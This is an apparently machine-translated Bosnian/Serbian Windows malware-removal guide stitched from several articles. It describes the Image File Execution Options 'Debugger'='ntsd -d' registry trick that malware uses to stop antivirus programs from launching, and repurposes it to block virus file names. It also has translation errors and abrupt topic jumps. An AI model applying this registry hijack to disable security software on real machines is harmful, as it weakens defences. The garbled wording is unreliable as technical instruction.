& nbsp & nbsp U nekom trenutku sam pokušao da pokrenem AVZ antivirusni uslužni program. Princip rada AVZ-a se u velikoj mjeri zasniva na traženju različitih anomalija u sistemu koji se proučava. S jedne strane, pomaže u potrazi za zlonamjernim softverom, ali s druge strane, sumnje u komponente antivirusnog, antispywarea i drugog legitimnog softvera koji aktivno stupaju u interakciju sa sistemom su sasvim prirodne. Da bi se suzbio AVZ-ov odgovor na legitimne objekte i da bi se pojednostavila analiza rezultata skeniranja sistema označavanjem legitimnih objekata bojom i filtriranjem iz evidencije, koristi se AVZ sigurna baza podataka datoteka. Nedavno je pokrenuta potpuno automatska usluga koja omogućava svima da šalju fajlove kako bi dopunili ovu bazu podataka.
Ali: izvršna datoteka avz.exe nije pokrenuta! Preimenujte avz.exe u musor.exe - sve počinje u redu. AVZ se još jednom pokazao kao nezamjenjiv pomoćnik u rješavanju problema. Prilikom provjere u rezultatima su se pojavile sljedeće linije:
Opasno - debuger procesa "avz.exe" = "ntsd-d"
Opasno - debuger procesa "avguard.exe" = "ntsd-d"
:.
Ovo je već bio ozbiljan trag. Pretraživanje registra za kontekst "avz" rezultiralo je granom
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Opcije izvršavanja datoteke slike
Imenovana sekcija avz.exe koji sadrži niz parametar pod nazivom "Debugger" i vrijednost.
I, kako se kasnije ispostavilo, ova grana nije sadržavala samo odjeljak "avz.exe", već i odjeljke s imenima izvršnih modula gotovo svih poznatih antivirusa i nekih uslužnih programa za praćenje sistema. Sam Ntsd.exe je potpuno legalan Windows program za otklanjanje grešaka, koji je standardan u svim verzijama OS-a, ali takav unos u registrator onemogućava pokretanje aplikacije, čiji se naziv izvršne datoteke poklapa sa imenom ?? Exe odjeljak.
& nbsp & nbsp Nakon brisanja svih ključeva pod nazivom ???.exe i koji sadrže unos "Debugger" = "ntsd -d" iz registra, sistem se potpuno oporavio.
Kao rezultat analize situacije sa korištenjem parametra "ntsd -d" za blokiranje pokretanja izvršnih datoteka, došla je ideja da se ista tehnika koristi za borbu protiv samih virusa. Naravno, ovo nije lijek, ali u određenoj mjeri može smanjiti prijetnju zaraze vašeg računala virusima s poznatim imenima izvršnih datoteka. Da onemogućimo izvršavanje datoteka sa imenima ntos.exe, file.exe, system32.exe, itd. na sistemu. možete kreirati reg fajl za uvoz u registar:
Windows Registry Editor verzija 5.00
"Debugger" = "ntsd -d"
"Debugger" = "ntsd -d"
"Debugger" = "ntsd -d"
:.. itd.
Imajte na umu da naziv odjeljka ne sadrži putanju datoteke, tako da se ova metoda ne može koristiti za datoteke virusa čija se imena podudaraju s nazivima legalno izvršnih datoteka, ali same datoteke nisu standardno smještene u sistemu datoteka. Na primjer, explorer Explorer.exe se nalazi u fascikli \ WINDOWS \, a virus se nalazi negdje drugdje - u korijenu diska, u folderu \ temp, \ windows \ system32 \. Ako kreirate particiju pod nazivom "Explorer.exe", nakon prijave, dobićete praznu radnu površinu jer se istraživač neće pokrenuti. Još gore, ako kreirate particiju koja ima isto ime kao sistemska usluga (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), dobićete srušen sistem. Ako se virus nalazi u C: \ temp \ winlogon.exe, a modul za legalnu prijavu je C: \ WINDOWS \ SYSTEM32 \ winlogon.exe, kreiranje particije pod nazivom winlogon.exe rezultirat će nemogućnošću pokretanja usluge winlogon i srušiti sistem plavim ekranom smrti (BSOD).
& nbsp & nbsp Ali, ipak, nije vrijedno nadati se da će kod koji virus traži odgovarati u svakom konkretnom slučaju. Kako se ne treba nadati poštenom samouništenju virusa, a još više, ne treba slati SMS. Svaki virus se može ukloniti, čak i ako ga antivirusni softver ne otkrije. Metode uklanjanja ransomware-a se ne razlikuju od metoda uklanjanja bilo kojeg drugog zlonamjernog softvera, s jednom, možda, razlikom - ne biste trebali gubiti vrijeme pokušavajući da se nosite sa smećem u okruženju zaraženog sistema, osim da razvijete vlastite vještine i dopunite znanje.
Najjednostavniji i najefikasniji način je da se pokrenete koristeći drugi, neinficirani sistem i, nakon povezivanja na zaraženi, izbrišete virusne datoteke i popravite unose u registru. O tome sam već pisao iznad, u glavnom dijelu članka, a ovdje ću pokušati jednostavno iznijeti nekoliko kratkih opcija za uklanjanje virusa.
Korišćenje Dr.Web LiveCD-a je najjednostavniji metod koji ne zahteva nikakva posebna znanja. Preuzmite iso CD sliku, narežite je na disk, pokrenite sistem sa CD-ROM-a i pokrenite skener. Korištenje Winternals ERD Commander. Podignete se sa njega, povežete se sa zaraženim sistemom i vratite se na kontrolnu tačku za oporavak sa datumom kada još nije bilo infekcije. Odaberite meni Sistemski alati - Vraćanje sistema... Ako ne možete da se vratite koristeći ERD Commander, pokušajte da ručno pronađete datoteke registra u podacima kontrolne tačke i vratite ih u Windows direktorijum.Detaljno sam opisao u članku "Rad sa registrom". Dizanje na drugi OS i ručno uklanjanje virusa. Najteži, ali najefikasniji način. Najpogodnije je koristiti isti ERD Commander kao drugi OS. Metoda za otkrivanje i uklanjanje virusa može biti sljedeća:
Idite na disk zaraženog sistema i skenirajte sistemske kataloge za izvršne datoteke i datoteke drajvera sa datumom kreiranja koji je blizak datumu infekcije. Premjestite ove datoteke u poseban folder. Obratite pažnju na imenike
\ Windows
\ Windows \ system32
\ Windows \ system32 \ drajveri
\ Windows \ Zadaci \
\ RECYCLER
\ Informacije o sistemskom volumenu
Korisnički imenici \ Dokumenti i postavke \ Svi korisnici i \ Dokumenti i postavke \ korisničko ime
Veoma je zgodno koristiti FAR Manager za traženje ovakvih fajlova, sa omogućenim sortiranjem po datumu za panel gde se prikazuje sadržaj direktorijuma (kombinacija CTRL-F5). Obratite posebnu pažnju na skrivene izvršne datoteke. Postoji i efikasan i jednostavan uslužni program kompanije Nirsoft - SearchMyFiles, čija upotreba omogućava, u ogromnoj većini slučajeva, lako otkrivanje zlonamernih datoteka čak i bez upotrebe antivirusa. Metoda za otkrivanje zlonamjernih datoteka prema vremenu kreiranja (Creation time)
Povežite se sa registrom zaraženog sistema i potražite veze do imena ovih datoteka. Sam registar ne ometa pretkopiranje (u potpunosti ili barem onih dijelova gdje se nalaze gornji linkovi). Možete izbrisati veze ili promijeniti imena datoteka u njima u druge, na primjer - file.exe u file.ex_, server.dll u server.dl_, driver.sys u driver.sy_.
Ova metoda ne zahtijeva posebno znanje, a u slučajevima kada virus ne promijeni datum izmjene svojih datoteka (što je još uvijek vrlo rijetko), ima pozitivan učinak. Čak i ako antivirusni softver ne otkrije virus.
Ako prethodne metode nisu uspjele, ostaje samo jedno - ručno traženje mogućih varijanti pokretanja virusa. Na meniju Administrativni alati ERD Commander" i tu su stavke:
Autoruns- informacije o parametrima pokretanja aplikacije i korisničkoj ljusci.
Service and Driver Manager- informacije o uslugama i sistemskim drajverima.
Moguća je situacija kada trebate izbrisati mapu, a Vidnovs 7 zabranjuje ovu radnju. Pojavljuju se greške s tekstom "Fascikla je već u upotrebi." Čak i ako ste potpuno sigurni da objekat nema nikakvu vrijednost i da se mora hitno ukloniti, sistem ne dozvoljava poduzimanje ove radnje.
Najvjerojatnije je ovaj kvar uzrokovan činjenicom da je izbrisanu mapu zauzela aplikacija treće strane. Ali čak i nakon što su sve aplikacije koje se mogu koristiti u njemu zatvorene, folder se možda neće izbrisati. Na primjer, elektroničko skladište podataka može biti blokirano zbog pogrešnih korisničkih operacija. Ovi elementi postaju "mrtva težina" na tvrdom disku i beskorisno zauzimaju memoriju.
Metoda 1: Total Commander
Najpopularniji i najfunkcionalniji upravitelj datoteka je Total Commander.
Metod 2: FAR menadžer
Još jedan upravitelj datoteka koji može pomoći u brisanju objekata koji se ne mogu ukloniti.
Metoda 3: Otključavanje
Unlocker je potpuno besplatan i omogućava vam da uklonite zaštićene ili zaključane fascikle i datoteke u Windows 7.
Metoda 4: FileASSASIN
Uslužni program FileASSASIN može ukloniti sve zaključane datoteke i mape. Princip rada je vrlo sličan Unlockeru.
Postoji niz sličnih programa koje možete pronaći na linku ispod.
Metod 5: Postavke foldera
Ova metoda ne zahtijeva nikakve pomoćne programe trećih strana i vrlo je jednostavna za implementaciju.
Metoda 6: Task Manager
Možda se greška javlja zbog pokretanja procesa unutar fascikle.
Metod 7: Windows 7 Safe Mode
Ulazimo u Windows 7 operativni sistem u sigurnom načinu rada.
Sada pronalazimo potrebnu fasciklu i pokušavamo da izbrišemo OS u ovom režimu.
U nekim slučajevima, jednostavno ponovno pokretanje sistema može pomoći. Ponovo pokrenite Windows 7 kroz meni "počni".
Inficiranje računara virusima nije nova tema za svakog korisnika računara. Prilikom učitavanja operativnog sistema pojavljuju se različiti prozori sa informacijama, neki programi ne rade ispravno, mijenja se početna stranica pretraživača i instaliraju se razni dodaci. Takođe se dešava da se računar uopšte ne uključuje ili se pokreće veoma dugo, a zatim usporava tokom rada.
Ako imate barem jedan od gore navedenih znakova, onda ste definitivno zaraženi virusom. Stoga, hajde da shvatimo na koje načine možete sami ukloniti virus sa svog računara.
Korištenje antivirusnog softvera
Prvo što treba da uradite je da skenirate računar pomoću instaliranog antivirusnog programa. Imam instaliran Avast, pa ga prikazujem. Pronađite odgovarajuću ikonu u traci i kliknite na nju mišem.
Otvoriće se glavni prozor programa. Sada se uvjerite da imate instaliranu najnoviju definiciju virusa: u "Postavke" idite na karticu "Ažuriraj". Pogledajte kada je primljeno posljednje ažuriranje, ako je potrebno, kliknite na dugme "Ažuriraj".
Sa padajuće liste izaberite Full Scan i kliknite na "Start". Ako imate instaliran drugi antivirusni program, pronađite istu stavku u njemu i omogućite potpuno skeniranje vašeg računara.
Stoga ćemo izvršiti potpuno skeniranje vašeg računara na viruse. Ovaj proces će potrajati dosta vremena - 11 sati, međutim, sve ovisi o tome koliko je informacija pohranjeno na računaru - što je njegov volumen veći, to je duže potrebno za provjeru.
Kada se proces u potpunosti završi, pokušajte izliječiti pronađene prijetnje. Ako se to ne može učiniti, onda ih je bolje izbrisati.
Bilo bi bolje da skeniramo računar na viruse drugim antivirusnim programom: na primjer, Dr.Web CureIt ili AVP Tool. Za kućnu upotrebu, ali ne i u komercijalne svrhe, ovi programi su potpuno besplatni. Osim toga, ne zahtijevaju instalaciju na računalu - neće biti sukoba s instaliranim antivirusom.
Dr.Web CureIt možete preuzeti sa službene web stranice slijedeći link:
https://free.drweb.ru/download+cureit+free/
AVP Tool je uslužni program iz laboratorije Kaspersky koji liječi računar već zaraženog korisnika. Preuzmite ga sa službene web stranice na linku:
http://www.kaspersky.com/antivirus-removal-tool
Bolje je preuzeti programe sa službene web stranice kako bi se u njoj instalirala najnovija ažuriranja baze virusa.
Da biste skenirali računar pomoću jednog od uslužnih programa koje ste odabrali, idite u siguran način rada: kada učitavate operativni sistem, pritisnite dugme F8. Sada pokrenite program i izvršite potpuno skeniranje.
Na kraju procesa pokušajte dezinficirati ili ukloniti pronađene prijetnje. Imajte na umu da nakon brisanja određenih datoteka neki piratski programi možda neće raditi.
Tretman računara od virusa pomoću antivirusnih programa ne daje nam 100% garanciju da je sada čist. Ovo zahtijeva još nekoliko koraka.
Uklanjanje nerazumljivih programa iz pokretanja
U ovom trenutku su vam potrebni ili oni koje koristite izuzetno rijetko. Pritisnite kombinaciju Win + R i u liniji Run upišite naredbu msconfig i kliknite OK.
Otvoriće se prozor. Ovdje potvrdni okviri označavaju programe koji se pokreću zajedno sa operativnim sistemom. Onemogućite pokretanje svih programa koji vam nisu potrebni: poništite potvrdne okvire nasuprot njih. Potražite nerazumljive programe na listi, s nejasnom lokacijom ili proizvođačem.
Kada završite, kliknite na Apply i OK.
Ako ste u nedoumici da li da onemogućite određenu stavku sa liste, zadržite pokazivač miša preko nje u odjeljku "Command" i pogledajte lokaciju datoteke. Zatim ga pronađite putem istraživača i zabilježite datum preuzimanja. Ako je to bilo u danima kada je računar bio zaražen, onda možete sigurno poništiti okvir.
Povezani videozapisi:
Provjera nedavno instaliranih programa
Da biste to učinili, idite na "Start" - "Kontrolna tabla" – "Programi i funkcije".
U sljedećem prozoru kliknite na kolonu "Instalirano" i pogledajte najnovije instalirane programe. Ako među njima ima onih koje niste instalirali (nerazumljivo, nepoznato ime i sadržaj) - kliknite na njega mišem i kliknite na "Izbriši".
Kako biste osigurali da uslužni programi ne ostavljaju nikakve tragove za sobom, koristite ih na PC-u. To se može učiniti ručno ili pomoću posebnih uslužnih programa.
Povezani videozapisi:
Provjera procesa u upravitelju zadataka
Opterećenje centralnog procesora može značajno usporiti performanse vašeg računara. Ako prije nije bilo problema i zamrzavanja, ali sada se suočavate s tim, onda je to možda rezultat zlonamjernog programa.
Kliknite na dugme "Start" i unesite u traku za pretragu "Upravitelj zadataka", zatim pritisnite Enter.
Ovdje idite na karticu "Procesi" i uvjerite se da nema velikih vrijednosti u koloni "CPU". Ako primijetite nešto sumnjivo, kliknite desnim tasterom miša na ovu liniju i izaberite iz kontekstnog menija "Otvori lokaciju za pohranu fajlova".
File Explorer će otvoriti lokaciju datoteke. Pogledaj u "Datum promjene" fajl. Ako se podudara s brojem kada ste vjerovatno uhvatili virus, onda izbrišite ovu datoteku i vratite se na "Upravitelj zadataka", odaberite željenu liniju mišem i pritisnite "Završi proces".
Uklanjanje privremenih datoteka
U ovom trenutku mi smo tamo gdje su pohranjeni svi privremeni fajlovi. Prvo morate omogućiti vidljivost datoteka i mapa. Idemo "Start" - "Kontrolna tabla" – "Postavke foldera".
U sljedećem prozoru idite na karticu "Prikaz" i stavite marker ispred stavke Prikaži skrivene fajlove, fascikle i diskove... Kliknite na "Primijeni" i "U redu".
Tražimo još jedan folder "Temp" na računaru:
C: - Korisnici - VAŠ ime naloga- AppData - Lokalno - Temp
Izbrišite i sve fajlove sa njega.
Povezani videozapisi:
Provjera hosts fajla
Ponekad virusi mogu doći do host fajla. Idite na sljedeću stazu:
C: - Windows - System32 - drajveri - itd
Kliknite desnom tipkom miša na datoteku pod nazivom "hosts", odaberite "Otvori" i otvorite je notepadom.
Za operativni sistem Windows 7, tekst treba da bude napisan u datoteci, kao na slici ispod.
Da biste smanjili upite prema DNS keš memoriji i DNS serverima, često učitane Internet stranice se također mogu upisati u hosts datoteku. Ako tamo primijetite sumnjive informacije, izbrišite ih.
Ako ste otišli u željenu mapu i tamo niste pronašli hosts datoteku, možda je to zbog virusa. Uključite vidljivost skrivenih datoteka i fascikli kao što je gore opisano. Zatim otvorite hosts datoteku koja se pojavi i vidite da je tamo napisan tekst koji bi trebao biti po defaultu.
Ako se promijeni, napišite sve kako treba. U slučaju da se fajl ne može uređivati, kreirajte novi sa ekstenzijom .txt i imenom hosts i napišite sav tekst, kao na slici iznad - za operativni sistem Windows 7. Za ostale operativne sisteme tekst je drugačije, pa potražite na internetu.
Čistimo registar
Ovo se mora uraditi ako ste deinstalirali sumnjivi program putem "Programi i funkcije", ili su prekinuli nerazumljivu datoteku u procesima.
Da biste otvorili uređivač registra, pritisnite kombinaciju Win + R. Zatim, u prozoru Pokreni, napišite regedit naredbu i kliknite na OK.
Sada na kartici "Uredi" odaberite "Pronađi" ili pritisnite kombinaciju Ctrl + F. U traku za pretragu unesite naziv programa ili dio imena koji ste nakon toga izbrisali "Programi i funkcije" ili "Instalacija i uklanjanje programa"... U traku za pretraživanje možete unijeti i naziv datoteke čiji ste rad obavili u procesima.
Ako se po imenu pronađe grana registra ili parametar, morat ćete ga izbrisati - odaberite parametar ili ključ registratora mišem i pritisnite Delete.
Brisanje keša pretraživača i uklanjanje dodataka
Ako je virus povezan s pretraživačem, prvo provjerite kuda vode prečice kreirane na radnoj površini. Da biste to učinili, kliknite desnim tasterom miša na prečicu pretraživača i idite na "Svojstva".
Ovdje, u polju "Objekat", provjerite da li veza vodi do disk jedinice i mape u kojoj je instaliran pretraživač. Ako veza vodi do sumnjive datoteke, izbrišite prečicu i ponovo je kreirajte.
Za brisanje keš memorije pretraživača koristite poseban program kao što je CCleaner. Preuzmite, instalirajte i pokrenite ga na svom računaru. Zatim u odjeljku "Čišćenje" na kartici "Aplikacije" odaberite potrebne stavke s kvačicama, kliknite "Analiza", a zatim "Čišćenje".
Sada idite na karticu "Proširenja", ako će biti instalirana proširenja koja imaju nerazumljiva imena ili ih niste sami instalirali - kliknite na "Ukloni".
Kreiranje CD-a uživo
Ovo je korisno ako je vaš računar blokiran virusom: uključuje se, ali se operativni sistem ne učitava. Kako snimiti Live CD na USB fleš disk ili disk i očistiti računar, pročitajte članak klikom na link.
Da biste to učinili, trebat će vam drugi računar s kojeg možete preuzeti sliku, prazan disk ili fleš disk. Također ćete morati promijeniti prioritet pokretanja u BIOS-u. Također možete pročitati članak o tome klikom na link.
